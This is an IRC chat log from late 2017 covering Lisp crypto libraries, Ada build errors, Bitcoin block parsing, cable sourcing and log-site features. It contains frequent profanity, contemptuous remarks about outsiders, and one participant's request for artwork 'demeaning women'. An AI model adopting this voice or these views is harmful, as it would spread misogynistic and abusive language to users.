1742528;1511455003;mircea_popescu;flea-irritated skin is preferred by fleas. 1742529;1511455006;asciilifeform;( do fleas quorum-sense ? ) 1742530;1511455013;mircea_popescu;lice too. which is why only "Some kinds of girls" get it in school. 1742531;1511455068;mircea_popescu;most parasitosis works that way, actually. there is such a thing as a rich guy's tuberculosis immunity. or, for that matter, aids. 1742532;1511455105;phf;asciilifeform: "Having to unfollow folks because I'm sick of cynical passive agressive subtoots." ""It will not hurt people who use gopher the way it has been used for ~30 years. It won't break things. Those folks can ignore what we're doing. This doesn't have to be antagonistic. If you don't wanna take part, that's cool! I'm not here to force you. Keep doing what you're doing, or do what we're doing. Either is wonderful" etc. 1742533;1511455114;asciilifeform;mircea_popescu: afaik proper aids immunity is a vanishingly rare item, and poorly understood yet 1742534;1511455137;asciilifeform;phf: lol tolerasts 1742535;1511455175;mircea_popescu;phf the difference in tone from the exact same item pushing bitcoin forks is that the gopher forks people have no one to fear in gopher. 1742536;1511455196;mircea_popescu;asciilifeform i didn't mean proper immunity, i just meant... 1742537;1511455215;mircea_popescu;actually, here's what i meant : vai de omu' sarac, nici boii nu-i trag, ii cade pita-n cicat si cind fute da de cui. 1742538;1511455222;mircea_popescu;dja want translation ? 1742539;1511455249;asciilifeform;pretty sure i get it 1742540;1511455271;phf;"there's some gopher purists out there but don't pay them much heed. There's no one in charge. There's nothing keeping you from your next big idea. There's nothing to stop you from trying. And besides, most of us think it's pretty cool." 1742541;1511455279;mircea_popescu;let's put in for teh logs : woe on the poor man, his oxen won't pull properly, his sandwich falls into shit and even when he fucks he runs into a rusty nail. 1742542;1511455288;mircea_popescu;phf hehehe 1742543;1511455504;ben_vulpes;whaack: i hastily stripped the cl i use behind mimisbrunnr for block parsing and transaction extracting into this tar for you: cascadianhacker.com/wp-content/uploads/2017/11/blockparser.tgz 1742544;1511455540;ben_vulpes;it is some very embarassingly java-flavored CLOS, read it with a skeptical eye 1742545;1511455606;ben_vulpes;i figure you can stitch it into a fare-friendly (asdf) form, if you have trouble or its missing bits let me know, 'tis a very hasty rip job 1742546;1511455622;*;ben_vulpes will also read asciilifeform 's ada cutter 1742547;1511455682;asciilifeform;ben_vulpes: it's pretty simple, makes use of ada's programmable stream 1742548;1511455691;phf;asciilifeform: i recall their being tight hashing code, but every time i do the same thing and discover that it was sb-md5 (and there's a corresponding cmucl prior art), so no proper shasum 1742549;1511455695;phf;*there 1742550;1511455715;asciilifeform;phf: iirc the sha256 in 'ironclad' is simply a c wrapper around turdssl 1742551;1511455722;ben_vulpes;ironclad needs a 'libressl'ing imho 1742552;1511455731;phf;asciilifeform: no! you keep saying that, ironclad is 0 ffi 1742553;1511455735;asciilifeform;hm 1742554;1511455750;asciilifeform;so it has a working sha2 already ? 1742555;1511455785;asciilifeform;and incidentally if phf knows this, possibly he studied it and is ready to genesis his personal copy ? 1742556;1511455787;phf;src/digests/sha1.lisp 1742557;1511455787;phf;src/digests/sha256.lisp 1742558;1511455787;phf;src/digests/sha512.lisp 1742559;1511455839;asciilifeform;if 'ironclad' is a worthy thing , it oughta be genesised 1742560;1511455907;asciilifeform;!~later tell whaack when testing 'horse', verify that the bin turd produced as file 'out' is identical to the input block. this means that the parser worx. 1742561;1511455907;jhvh1;asciilifeform: The operation succeeded. 1742562;1511455908;phf;maybe, but only as "presented as found". froydnj said in a few places, that he doesn't think ironclad is there yet as far as being used for production crypto. and we had a thread (with ben_vulpes) where we discovered that sha512 (!!!) had a bug 1742563;1511455917;ben_vulpes;phf: do you know anything about the 'sharplispers'? 1742564;1511455937;ben_vulpes;phf: bug was also fixed at some point 1742565;1511455977;phf;yeah, was fixed in master, but not in quicklisp production, my point is mostly "what other wonders are there". like you said needs libressling 1742566;1511455993;asciilifeform;i gotta ask, what means 'libressling' 1742567;1511456007;ben_vulpes;also ironclad rsa padding is notquiteright, trinque i believe knows a bit more 1742568;1511456013;asciilifeform;iirc 'libressl' was an attempted whitewashing of openssl turd by the usual suspects. 1742569;1511456026;asciilifeform;ben_vulpes: nobody's rsa padding is worth two shits 1742570;1511456044;ben_vulpes;asciilifeform: did not actually work i mean. 1742571;1511456072;ben_vulpes;created messages that were undecipherable iirc 1742572;1511456085;mircea_popescu;asciilifeform yes buit it ended up not being needed, the "community" "consensused" that "openssl is okay" np. 1742573;1511456093;mircea_popescu;the libre bs was in case of orange revolution. 1742574;1511456104;asciilifeform;backup prong aha. 1742575;1511456116;ben_vulpes;i mean an ideal republican gutting. 1742576;1511456128;mircea_popescu;then what's wrong with tmsrizing. 1742577;1511456134;ben_vulpes;perhaps shoulda said "needs a stan/mpi style gutting" 1742578;1511456138;ben_vulpes;sure, tmsrification 1742579;1511456176;phf;ben_vulpes: sharplispers i believe is the #lisp crowd who maintain "abandoned" packages (mostly for the purposes of xach having somewhere to git clone things from for his quicklisp). i know xach, luis oliveira, and nikodemus siivola, the last one being a proper hacker 1742580;1511456233;mircea_popescu;* Loaded log from Thu Jan 19 19:08:32 2017 << i guess once a year . 1742581;1511456299;asciilifeform;mircea_popescu: wassat 1742582;1511456312;mircea_popescu;#lisp. 1742583;1511456384;mircea_popescu;omfg their logs are terrible. 1742584;1511456389;mircea_popescu;THREE scrollbars ? really ?! 1742585;1511456446;asciilifeform;mircea_popescu: can haz link ? 1742586;1511456451;mircea_popescu;https://irclog.whitequark.org/lisp 1742587;1511456475;whaack;http://btcbase.org/log/2017-11-23#1742543 << ty sir 1742588;1511456475;a111;Logged on 2017-11-23 16:45 ben_vulpes: whaack: i hastily stripped the cl i use behind mimisbrunnr for block parsing and transaction extracting into this tar for you: cascadianhacker.com/wp-content/uploads/2017/11/blockparser.tgz 1742589;1511456517;asciilifeform;!~seen mrottenkolber 1742590;1511456517;jhvh1;asciilifeform: I have not seen mrottenkolber. 1742591;1511456529;asciilifeform;!#seen mrottenkolber 1742592;1511456529;a111;2017-03-04 I know, I know, people are not REPLs 1742593;1511456531;mircea_popescu;uncharacteristically, the snr isn't even terrifying! 1742594;1511456552;asciilifeform;!#s jackdaniel 1742595;1511456552;a111;27 results for "jackdaniel", http://btcbase.org/log-search?q=jackdaniel 1742596;1511456560;mircea_popescu;https://www.youtube.com/watch?v=UZf1DzJYO8o << so much toastmasters i'd love to hire this guy to read eulora things for me. 1742597;1511456615;asciilifeform;'DAYDREAMER activates a top-level LOVERS goal because it is not involved in a LOVERS relationship, and one or more of its need states subsumed by the relationship are unsatisfied. A new concern is created and a positive motivating emotion of interest is created and associated with the new concern. The intrinsic importance of the goal is 0.9. This becomes the magnitude of the motivating emotion, as well as the current value for the mo 1742598;1511456615;asciilifeform;tivation of the concern.' 1742599;1511456632;asciilifeform;( via https://irclog.whitequark.org/lisp/2017-11-23#20617523 ) . 1742600;1511456684;phf;mircea_popescu: i like that video series, it seems so innocent 1742601;1511456693;mircea_popescu;it's not ? 1742602;1511456735;mircea_popescu;also castlevania fucking rocks. 1742603;1511456746;phf;you never know with these things, but on face value it definitely is 1742604;1511456748;mircea_popescu;prince of persia for z80 basically. epic for the 80s 1742605;1511456792;mircea_popescu;phf do you know this k-stz guy ? 1742606;1511456869;phf;no, he's not part of the kommunity which is also probably why he doesn't suck 1742607;1511456920;phf;he also speaks ada, https://pastebin.com/PdDePdag 1742608;1511456931;mircea_popescu;i like the part where he explains why 2^32 scan being 1.6 seconds is not good news for scanning 2^32 1742609;1511456937;mircea_popescu;"several orders of magnitude moar" 1742610;1511456952;mircea_popescu;phf dja have a conduit to invite him here ? i think smg wants to hire him. 1742611;1511456992;phf;no, but i'll give it a try, i think it's my turn to attempt to invite a random stranger to trilema and see him run away in horror 1742612;1511457010;mircea_popescu;it's always everyone's turn!!11 1742613;1511457728;mircea_popescu;phf so who's bike ? 1742614;1511457755;mircea_popescu;other than some cannonical dood. 1742615;1511457936;phf;i know he talks on #lisp, but i don't have anything about him, i.e. i'm pretty sure he's not doing anything visible 1742616;1511458143;mircea_popescu;as per intel, cannonical, mastodon. grad student, "I subsist on hot pockets". 1742617;1511458148;mircea_popescu;jesus fucking christ america sucks. 1742618;1511459009;phf;heh 1742619;1511459740;whaack;asciilifeform: gnat1: error: unrecognized command line option ‘-fdump-scos’ when I try gprbuild. gnat version 4.6 gcc version 4.8.4. I removed the command line option from the gpr file since it seemed to be just used for coverage tools. Then got error prefix of "Image" attribute must be a type in 3 places in blocks.adb 1742620;1511459903;mircea_popescu;asciilifeform so it appears that whitequark item is actually a many-channel log. 1742621;1511460452;mircea_popescu;ben_vulpes hey, how hard would it be to add a flag (=lisp) to bpaste, make it highlight and shit as per #lisp folk spec ? ("<|3b|> mircea_popescu: links to spec in particular, + interactive paren highlighting") 1742622;1511460466;mircea_popescu;!!up candi_lustt 1742623;1511460467;deedbot;candi_lustt voiced for 30 minutes. 1742624;1511460655;mircea_popescu;meanwhile in belaboured smiles, http://78.media.tumblr.com/e148eb5931c7c33d5c1a48c116f559cd/tumblr_nkwscth1sW1sg0ns8o1_500.gif 1742625;1511460793;mircea_popescu;!W http://p.bvulpes.com/pastes/Wpld4/?raw=true 1742626;1511460794;candi_lustt;mircea_popescu: error, see: http://p.bvulpes.com/pastes/dLGSP/?raw=true 1742627;1511460873;phf;that's actually a cute idea, have a bot do the `read' on whatever's pasted, but obviously only works here, not on #lisp (since all kinds of attack vectors) 1742628;1511460900;mircea_popescu;phf im giving them time to figure out republicaqn supremacy on own power. 1742629;1511460910;mircea_popescu;the obvious downside being... takes a while. 1742630;1511461011;phf;by the way, their bot's code is public. i poached their highlighter for example for btcbase file rendering 1742631;1511461054;mircea_popescu;i recall you saying this way back then 1742632;1511461427;asciilifeform;http://btcbase.org/log/2017-11-23#1742619 <<< >>> http://btcbase.org/log/2017-06-06#1666683 1742633;1511461427;a111;Logged on 2017-11-23 17:55 whaack: asciilifeform: gnat1: error: unrecognized command line option ‘-fdump-scos’ when I try gprbuild. gnat version 4.6 gcc version 4.8.4. I removed the command line option from the gpr file since it seemed to be just used for coverage tools. Then got error prefix of "Image" attribute must be a type in 3 places in blocks.adb 1742634;1511461427;a111;Logged on 2017-06-06 20:38 asciilifeform: diana_coman: the example was written on a box with adacore's gnat; the stock gnu one is stricter, doesn't permit Foo'Image -- instead you gotta FooTypeName'Image(Foo) 1742635;1511461451;asciilifeform;whaack: lemme know if this fixes. 1742636;1511461476;asciilifeform;whaack: i wrote the thing back when i was mostly using adacore's gnat 1742637;1511462014;mircea_popescu;and no further than ONE DAY BACK in this log which seemed very respectable snr-wise on the basis of my hsaving read today, there's a PILE of "how to lisp on windows" and "how to utf-8 unicode etc". 1742638;1511462024;mircea_popescu;goes well with "we have nfi what could help us". 1742639;1511462030;mircea_popescu;blerhgs. 1742640;1511462082;ben_vulpes;fuckin whitequark 1742641;1511462093;ben_vulpes;keeps jumpin me damn browser to the pagebottom 1742642;1511462101;mircea_popescu;it's a remarkable pos. 1742643;1511462153;phf;ben_vulpes: you gotta unclick "Live updates" 1742644;1511462166;mircea_popescu;phf where ? 1742645;1511462166;*;ben_vulpes unchecks 1742646;1511462178;ben_vulpes;top, right of the searchbar 1742647;1511462193;mircea_popescu;all i have is show join/leave, which doesn't cover nick changes 1742648;1511462208;ben_vulpes;exciting 1742649;1511462230;mircea_popescu;oh oh it's because i was on archived page. 1742650;1511462234;whaack;asciilifeform: that fixed the problem, now hash_streams.adb:25:22: "Binary_Message_Digest" not declared in "SHA256" 1742651;1511462307;*;phf afk 1742652;1511462420;ben_vulpes;mircea_popescu: i don't get why people who want code highlit don't open the code in a proper editor 1742653;1511462479;mircea_popescu;ben_vulpes i don't get ~anything about how the brains of these people work, so far. asking questions didn't get me much further, moved on to proposing prototypes, which... is going nowhere. 1742654;1511462516;ben_vulpes;i don't want to try reimplementing emacs shittily for the browser, server-side. 1742655;1511462555;mircea_popescu;just the parens highlight thing doesn't seem that gnarly. am i naive ? 1742656;1511462667;ben_vulpes;shouldn't be that bad, no. i still don't understand the why of it. after five minutes of working with lisp the parens should disappear into background bookeeping on any usable brainsubstrate 1742657;1511462682;mircea_popescu;myeah. 1742658;1511462707;ben_vulpes;like if you need colorized parens whatever you're working on has definitely escaped your ability to hold it in your head. 1742659;1511462764;mircea_popescu;tbh an ~hour later my patience with teh #lisp is waning fast. yes it's not cohesive a la catv-org or whatever other dorkitudes we examined prior, which means there's no specific failure mode. but this doesn't mean much, it vaguely flails like an ooze and well... 1742660;1511462807;asciilifeform;http://btcbase.org/log/2017-11-23#1742650 << whaack plz post which gnat you have, and how it was installed 1742661;1511462807;a111;Logged on 2017-11-23 18:37 whaack: asciilifeform: that fixed the problem, now hash_streams.adb:25:22: "Binary_Message_Digest" not declared in "SHA256" 1742662;1511462837;asciilifeform;and paste also the full barf. 1742663;1511462846;ben_vulpes;!#s s2n 1742664;1511462847;a111;4 results for "s2n", http://btcbase.org/log-search?q=s2n 1742665;1511462938;ben_vulpes;"break this one 'cs'prng and everything running on bezosnet is yours, kid!" https://aws.amazon.com/blogs/opensource/better-random-number-generation-for-openssl-libc-and-linux-mainline/ 1742666;1511462965;asciilifeform;ben_vulpes: gotta luvv how prng now routinely 'random number generator' 1742667;1511462976;whaack;asciilifeform: http://wotpaste.cascadianhacker.com/pastes/ZaFt4/?raw=true gnat 4.6 on ubuntu 14.04.5 x64 through apt-get 1742668;1511462981;asciilifeform;as if the 'p' evaporates, unhappens, if not mentioned 1742669;1511462999;ben_vulpes;gotta love how they staple "cryptographically secure" onto "pseudo random" so unthinking derps forget about the "pseudo" part 1742670;1511463009;ben_vulpes;lol aha 1742671;1511463024;asciilifeform;whaack: surreal. 1742672;1511463064;asciilifeform;whaack: eventually i'm doomed to write a proper sha2 , apparently, gnat's apparently is shitgnomatic. 1742673;1511463069;ben_vulpes;not even thinking, these people. stackframes fabricated whole from reference to "computationally secure", reader has room for 2 words, and so "pseudo" is never evaluated 1742674;1511463080;*;ben_vulpes bbl 1742675;1511463107;asciilifeform;( i.e. someone saw it fit to change its semantics, between versions, as if such a change is ever anything other than wrecking ) 1742676;1511463206;asciilifeform;whaack: if you really want to run the example proggy, will have to get hold of 4.9 somehow 1742677;1511463228;asciilifeform;( or adacore's gnat ) 1742678;1511463325;whaack;alright I'll look into it more later, for my purposes I think ben_vulpes's code will be sufficient for now 1742679;1511463469;asciilifeform;aite 1742680;1511463497;asciilifeform;http://btcbase.org/log/2017-11-23#1742659 <<< see also >> http://btcbase.org/log/2017-11-07#1733724 1742681;1511463497;a111;Logged on 2017-11-23 18:46 mircea_popescu: tbh an ~hour later my patience with teh #lisp is waning fast. yes it's not cohesive a la catv-org or whatever other dorkitudes we examined prior, which means there's no specific failure mode. but this doesn't mean much, it vaguely flails like an ooze and well... 1742682;1511463497;a111;Logged on 2017-11-07 22:59 asciilifeform: this is the fate of all 'we don't have an ideology' derps 1742683;1511463504;mircea_popescu;quite. 1742684;1511463518;mircea_popescu;"room has no owner, therefore evidently no possible utility." and so on. 1742685;1511463534;asciilifeform;to have ideology is sorta like the coherence of laser light. 1742686;1511463554;asciilifeform;decohered -- aimless ooze, the peaks cancel, no movement. 1742687;1511463556;mircea_popescu;in that if you don't have one, you have the wreckers'. 1742688;1511463624;asciilifeform;who has none, is a plaything for the wind, the insects, the fungi. 1742689;1511463627;mircea_popescu;anwyay : such is true luxury in life, to be able to disinterestedly walk into #lisp, spend an hour evaling and shrug. 1742690;1511463637;mircea_popescu;marriott-luxury a very poor substituter. 1742691;1511464022;asciilifeform;in other not-yet-noose, asciilifeform considered the q of : can show a lower bound for how quickly (i.e. bits leaked per bit of ciphertext sent ) any n-bit-keyed symmetriccipher leaks its key , from purely informationtheoretical grounds ? or not. 1742692;1511464079;mircea_popescu;not an idle consideration 1742693;1511464097;asciilifeform;imho it is an approachable thing. but i haven't yet the pill. 1742694;1511464132;asciilifeform;could restate as the q of whether 'distance from ideal otp' is a quantifiable matter . 1742695;1511464166;asciilifeform;and then proceed to something resembling concept of carnot efficiency, but for cipher. 1742696;1511464203;mircea_popescu;this'd be lovely. 1742697;1511464219;mircea_popescu;spealking of which, http://78.media.tumblr.com/f06516359073a4f18eec03d850c7e8b9/tumblr_ne5qx4NTyZ1u1p6qjo1_1280.jpg 1742698;1511464261;*;asciilifeform bbl, meat 1742699;1511464819;mircea_popescu;speaking of which : one girl has been in the kitchen since daybreak (bout 8 hours ago) cooking non stop. 1742700;1511464839;mircea_popescu;she's tallied up all the sugar we saved, comes to almost a quarter ton! 1742701;1511464861;mircea_popescu;cranberry sauce recipe goes "mix one cup of liquid with cup and a half of sugar" and so following. 1742702;1511464894;mircea_popescu;"basically i multiply the portions by 8 and divide the sugar also by 8" 1742703;1511464921;mircea_popescu;1/64th of the recommended dosage is just about enough to be exaggerate for normal human! 1742704;1511466082;BingoBoingo; hey BingoBoingo wtf is a 'testosterona' ? boiled goat balls, straight from 1950s quackeries ? << direct translation of testosterone. Probably what's being marketed is a depot formulation of testosterone attached to a long chain esther 1742705;1511466115;BingoBoingo; speaking of which : one girl has been in the kitchen since daybreak (bout 8 hours ago) cooking non stop. << How's your stuffing coming along? 1742706;1511469771;diana_coman;http://btcbase.org/log/2017-11-23#1742497 <- oh, hey, thank you; ftr I took it, changed the type'Image things and then it compiled perfectly fine (with gnatmake 4.9.3, gcc 4.9.4) 1742707;1511469771;a111;Logged on 2017-11-23 16:28 asciilifeform: whaack: http://www.loper-os.org/pub/horse.tar.gz 1742708;1511469825;diana_coman;fwiw I remember at some point I ran into weird issues with gnat that were apparently due to mismatched gcc version 1742709;1511469990;whaack;diana_conman: cool, when I get back to it I'll try switching out my gnat/gcc first 1742710;1511470083;mircea_popescu;BingoBoingo moar eastern style, deviled eggs, apple pie, that sorta thing. bbq lamb... 1742711;1511470092;BingoBoingo;Nice 1742712;1511470115;BingoBoingo;This year's bird here is a beef brisket 1742713;1511471193;shinohai;I'm thinking about buying a server in the North Sea 1742714;1511471233;*;diana_coman had this flash image of shinohai paddling in the North Sea atop a server 1742715;1511471279;shinohai;nah there is this crazy family that has a micronation in the middle of the ocean. 1742716;1511471288;shinohai;i just introduced them to trb 1742717;1511471290;shinohai;xD 1742718;1511471343;diana_coman;what is a micronation? 1742719;1511471374;shinohai;https://en.wikipedia.org/wiki/Principality_of_Sealand 1742720;1511471389;shinohai;they have a rack of servers and i can buy one lol 1742721;1511471415;diana_coman;oh, the Floating Bear sort of thing, lol; close to "atop a server" 1742722;1511471443;shinohai;very much so! :D 1742723;1511471538;shinohai;im going to be tmsr ambassador to sealand! xD 1742724;1511471657;phf;ok, i have some idea why http://btcbase.org/log/2017-11-23#1742652 because i've done it in the past. when you're debugging issues for complete newbs, you basically instinctually looking for two things, imbalanced parenthesis and misuse of intrinsics. yeah you could copy paste that stuff to your emacs buffer, but if what you're doing is essentially social service work, you get burned out on doing deep help pretty fast, hence you want to keep it in the p 1742725;1511471657;a111;Logged on 2017-11-23 18:40 ben_vulpes: mircea_popescu: i don't get why people who want code highlit don't open the code in a proper editor 1742726;1511471657;phf;aster 1742727;1511471842;phf;i've seen properly indented code before, that never the less lost or misplaced parenthesis here or there. naggum actually had a rant somewhere how most experienced lispers actually discover nesting issues by doing reindent. but if you're a newb, you're going to lose a parent, but keep the code shape the same 1742728;1511472282;BingoBoingo; nah there is this crazy family that has a micronation in the middle of the ocean. << That's awfully close to airstrip one 1742729;1511472616;shinohai;sovereignty ftw 1742730;1511472690;shinohai;i want to at least host my blog there 1742731;1511472722;BingoBoingo;How much do boxes there run, and you've been blogging? 1742732;1511472834;shinohai;1000 /yr and whoreticulture of course 1742733;1511472947;shinohai;i guess i could write about the #trilema-church project 1742734;1511473000;phf;trilema-church i think has to be a danielpbarron project 1742735;1511473031;mircea_popescu;so here's a something : on one hand i very much like https://pbs.twimg.com/media/CyX33qsWIAAdMW3.jpg ; on the other hand i am kinda considering hiring a court artist for my own personal self-aggrandization. 1742736;1511473088;mircea_popescu;the idiot author of the linked piece is too fucking dumb to answer emails to his god damned own contact email as provided by patreon, notwithstanding he evidently is fucking starving. ho the fuck even told these schmucks they're at liberty to you know, "make own decisions" such as not pick up phone from god ? 1742737;1511473114;mircea_popescu;but anyway -- does anyone want to go through all of deviantart until they find either something like that or something that doesn't suck ? for the purpose of helping the first tmsr appointed artist get his appointment ? 1742738;1511473155;mircea_popescu;(deviantart here used as metasyntactic notation for "whatever shitty forum these mortidifame gather upon") 1742739;1511473155;shinohai;i can try mircea_popescu 1742740;1511473172;shinohai;thats awesum 1742741;1511473181;mircea_popescu;ok but intensively plox. "can try" as in you know, i checked out 1mn pix. 1742742;1511473215;shinohai;oh ill bug the oc artist above intensively 1742743;1511473227;mircea_popescu;lmao no no 1742744;1511473230;mircea_popescu;OTHER ones is the idea. 1742745;1511473238;mircea_popescu;this one... whatever, learn to answer. 1742746;1511473246;shinohai;u just want to look @ similar ones? 1742747;1511473257;BingoBoingo;Not picking up phone from God is disqualifying via character defect 1742748;1511473258;mircea_popescu;i don't even care if they're similar per se, just as long as they're good. 1742749;1511473294;mircea_popescu;and show the proper values, such as demeaning women, bare cunts, etcetera. 1742750;1511473312;shinohai;in other Argentine explosions: http://archive.is/2BThJ 1742751;1511473340;mircea_popescu;shinohai basically just go through all the pages of https://www.deviantart.com/cartoons/whats-hot/ i guess 1742752;1511473856;mircea_popescu;http://btcbase.org/log/2017-11-23#1742727 << wouldn't something like "run it by candi" work as an infinitely better solution to this problem than html-css ? 1742753;1511473856;a111;Logged on 2017-11-23 21:17 phf: i've seen properly indented code before, that never the less lost or misplaced parenthesis here or there. naggum actually had a rant somewhere how most experienced lispers actually discover nesting issues by doing reindent. but if you're a newb, you're going to lose a parent, but keep the code shape the same 1742754;1511474556;phf;misplaced parenthesis is tricky to debug from the error messages, in fact i usually can't. i can usually intuit that the error is probably a result of misplaced parent, but then i still have to go an track it down 1742755;1511474687;phf;i mean, a _misplaced_ parenthesis will result in a valid parse, but the error is going to be something along the lines of "error while parsing arguments to special form" or "argument x is not a number" or "function call with n arguments, but wants exactly m" 1742756;1511476181;shinohai;http://archive.is/FSLHx <<< lollerz 1742757;1511479006;phf;hardcoregaming101 "modernized" their website, original http://hg101.kontek.net/, new http://www.hardcoregaming101.net. it took me a while to realize that "new" site is not in fact a lost domain. in the process old site is still there, but half the links are broken. welcome to "modern"! 1742758;1511479593;mircea_popescu;well the old one was prolly confusing 1742759;1511481620;phf;asciilifeform: how where do you source your cat5e? i've been using a leftover roll from my contracting days, but it finally ran out. went on amazon, not only are prices somewhat suspect (300m for $40?), but comments say that they cable doesn't actually conform to spec (wrong insulation, wrong conductor, etc.) 1742760;1511481633;phf;/how // 1742761;1511482207;mircea_popescu;100% is made in china and the chinese don't respect any specs other than some stuff written on an old napkin in the head office. 1742762;1511486825;whaack;http://wotpaste.cascadianhacker.com/pastes/NDfgM/?raw=true 4,512.058 btc sent to 1045 non-trb-recognizable outputs as determined by ben_vulpe's block slicer in block 495813. The paste shows (txn-hash output num-satoshis) for every bunk output. 1742763;1511487088;whaack;I will work on creating an index of all of these non standard outputs of the form (txn-hash:output-index --> satoshis) sum up all the satoshis sent into the abyss from all past blocks, and then subtract spent coins in future blocks to get a value of how many coins are in the abyss at block n 1742764;1511489958;asciilifeform;phf: https://www.amazon.com/dp/B00CA2V7I0 1742765;1511490026;asciilifeform;mine fwiw was copper. but who knows nao, could easily have become pure chinesium any day. 1742766;1511491519;mircea_popescu;http://btcbase.org/log/2017-11-24#1742762 << so basically ~0% 1742767;1511491519;a111;Logged on 2017-11-24 01:27 whaack: http://wotpaste.cascadianhacker.com/pastes/NDfgM/?raw=true 4,512.058 btc sent to 1045 non-trb-recognizable outputs as determined by ben_vulpe's block slicer in block 495813. The paste shows (txn-hash output num-satoshis) for every bunk output. 1742768;1511491520;mircea_popescu;nice work. 1742769;1511491540;mircea_popescu;!!rated whaack 1742770;1511491541;deedbot;mircea_popescu rated whaack 1 at 2015/04/04 16:13:45 << New blood 1742771;1511491581;mircea_popescu;!!rate whaack 2 computed total segwit impact on bitcoin ecosystem. turned out to be less than 1 parts per thousand. 1742772;1511491583;deedbot;Get your OTP: http://p.bvulpes.com/pastes/P30rs/?raw=true 1742773;1511491608;whaack;doesn't mean much, that was just the recent block. also not necessarily segwit 1742774;1511491618;whaack;bbl 1742775;1511491630;mircea_popescu;oh, i read UP TO block x 1742776;1511491679;whaack;aha no i was kinda surprised by how much it was in 1 block tbh 1742777;1511491790;mircea_popescu;18.376 total . 1742778;1511492790;BingoBoingo;Still that's every address that starts with 3, so likely some no segwit turds in there 1742779;1511494477;BingoBoingo;!~ticker --market all 1742780;1511494482;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 8105.67, vol: 9227.57351752 | Bitfinex BTCUSD last: 8081.1, vol: 38473.41676882 | CampBX BTCUSD last: 3450.0, vol: 0 | Kraken BTCUSD last: 8024.7, vol: 4535.55664029 | Volume-weighted last average: 8080.54322673 1742781;1511494607;BingoBoingo;!~bcstats 1742782;1511494608;jhvh1;BingoBoingo: Current Blocks: 495823 | Current Difficulty: 1.364422081125E12 | Next Difficulty At Block: 495935 | Next Difficulty In: 112 blocks | Next Difficulty In About: 17 hours, 9 minutes, and 34 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None 1742783;1511497898;mircea_popescu;in other items, https://i.imgur.com/1lfVFJu.jpg 1742784;1511498117;phf;asciilifeform: ty, and another question, where was the code for that com1 to display thing that you had? 1742785;1511498357;phf;heh, we now also have a heathen logger. 1742786;1511498372;mircea_popescu;i invited him, actually. 1742787;1511498557;*;phf nods 1742788;1511498573;mircea_popescu;possibly the most logged channel on freenode, by now. 1742789;1511498614;phf;i like some features that he has, live updates, also the convention of #; 1742790;1511498645;phf;so, e.g. https://irclog.whitequark.org/trilema/2017-11-24#20622825;heathen 1742791;1511498664;phf;err, wait that actually made no sense.. 1742792;1511498692;mircea_popescu;seems to work, like a search. 1742793;1511498740;phf;well, right, it highlights a specific post, but also filters, so ...#;foo works as a whole day filter 1742794;1511498844;mircea_popescu;not a terrible idea, imo. 1742795;1511499099;mircea_popescu;in fact, a per-day filtered-histogram could conceivably be very fucking useful hunting down large topics. 1742796;1511499114;mircea_popescu;put one pixel line per day, from top to bottom, counting the occurences of $filter. 1742797;1511499210;phf;that would be a useful feature, that's almost like a part of search functionality 1742798;1511499226;mircea_popescu;sorta numerically enhanced topic finding. 1742799;1511499282;phf;because #; in question is a javascript and for a specific day. since we use links for xref, i'm not sure what the semantic value of linking is going to be in that case. also mandatory javascript 1742800;1511499303;mircea_popescu;not mandatory js at all, can do this server side 1742801;1511499328;mircea_popescu;make a call like histograph?derpage, puts out a png with the histograph for that item 1742802;1511499343;phf;oh you mean your example, not what whitequark has 1742803;1511499351;mircea_popescu;well yes. 1742804;1511499420;mircea_popescu;i don't think the functionality as such is particularly useful, i prefer the search. however the perspective actually is, filters would prolly empower the searching mind. 1742805;1511499444;mircea_popescu;some kind of noun density or such. 1742806;1511499589;mircea_popescu;phf you know what you could do, add it to search pages. would that be a lot of cpu ? to spit out a png maybe 2k x 200 tall, and link it from a compressed version on the search page. 1742807;1511499617;phf;that's what i'm thinking :) 1742808;1511499643;mircea_popescu;compressed version always page width, allowing thus to produce a proper as-wide-as-days-to-date item. 1742809;1511499699;phf;hmm, i'm not groking the whole compressed version thing 1742810;1511499707;mircea_popescu;let's specify. 1742811;1511499793;mircea_popescu;you decide on an image to be displayed on search page, specifically. "i want it 1024 x 168 pixels". you separately produce a png, as wide as day count, and as tall as daycount * 168 / 1024 rounded. you fill that png with the proper lines, proportionally (so highest count day gets full line, all other days get proportional line). then you scale it down to 1024 x 168. you publish this scaled down item on the search page, and yo 1742812;1511499793;mircea_popescu;u use it as an anchor to the full size item. 1742813;1511499851;mircea_popescu;can keep all of these in a world-accessible directory which is purged say weekly. or whatever, "once a week of all items older than a week" like the pastes. 1742814;1511499867;phf;ah word 1742815;1511499914;mircea_popescu;sorta like what you already do with line debit per day. 1742816;1511499926;mircea_popescu;but, honestly, you might ALSO make that full width and use the same approach for it. 1742817;1511499936;mircea_popescu;as opposed to the current what is it. 1742818;1511500144;phf;right now it's tracking proportional message count per hour, so perhaps message count per minute, but then it's a 1440 pixels width 1742819;1511500178;phf;hmm, actually i don't think per minute is any indicator of anything. 1742820;1511500180;mircea_popescu;you just decide on a pixel count based on your design, and then you split the 24 * 3600 day into that many units 1742821;1511500192;mircea_popescu;you'll basically get a smoother curve than what you have now 1742822;1511500235;mircea_popescu;hm, this isn't very workable in fact, your log page is not fixed width is it. just flows. 1742823;1511500262;BingoBoingo;In other graphics https://i.imgur.com/y4Src5L.png 1742824;1511500357;mircea_popescu;wut is this inept crap 1742825;1511500505;phf;so right now we have exactly 2048 days of log (though that number makes me suspect maybe my day counter is broken somehow) 1742826;1511500583;mircea_popescu;o.O 1742827;1511500597;mircea_popescu;this calls for like a celebration or something. 1742828;1511501666;mircea_popescu;phf heathen doesn't even begin to describe it btw. fellow has not just the logger, but a pile of cogent stuff, say https://lab.whitequark.org/notes/2017-11-08/accessing-intel-ich-pch-gpios/ while at the same time managing to work for patent nonsense (quantum computer makers etc), retweeting alf's favourite isis and so on and so forth. 1742829;1511501679;mircea_popescu;one day i'll understand how this sense-nonsense alloying works. 1742830;1511501812;mircea_popescu;!!up gabriel_laddel 1742831;1511501813;deedbot;gabriel_laddel voiced for 30 minutes. 1742832;1511501857;mircea_popescu;"Traditional gateware design with Verilog and VHDL is well known to be tedious and inefficient. M-Labs have developed Migen, a Python-based HDL and toolbox that addresses many of their issues and makes gateware design more productive. Built on Migen, MiSoC provides a high performance, flexible and lightweight solution to build system-on-chips for various applications." 1742833;1511501859;gabriel_laddel;http://btcbase.org/log/2017-11-18#1740498 < "Are you employed? The courts are looking for lost wages in medmal cases" 1742834;1511501859;a111;Logged on 2017-11-18 22:31 ben_vulpes: 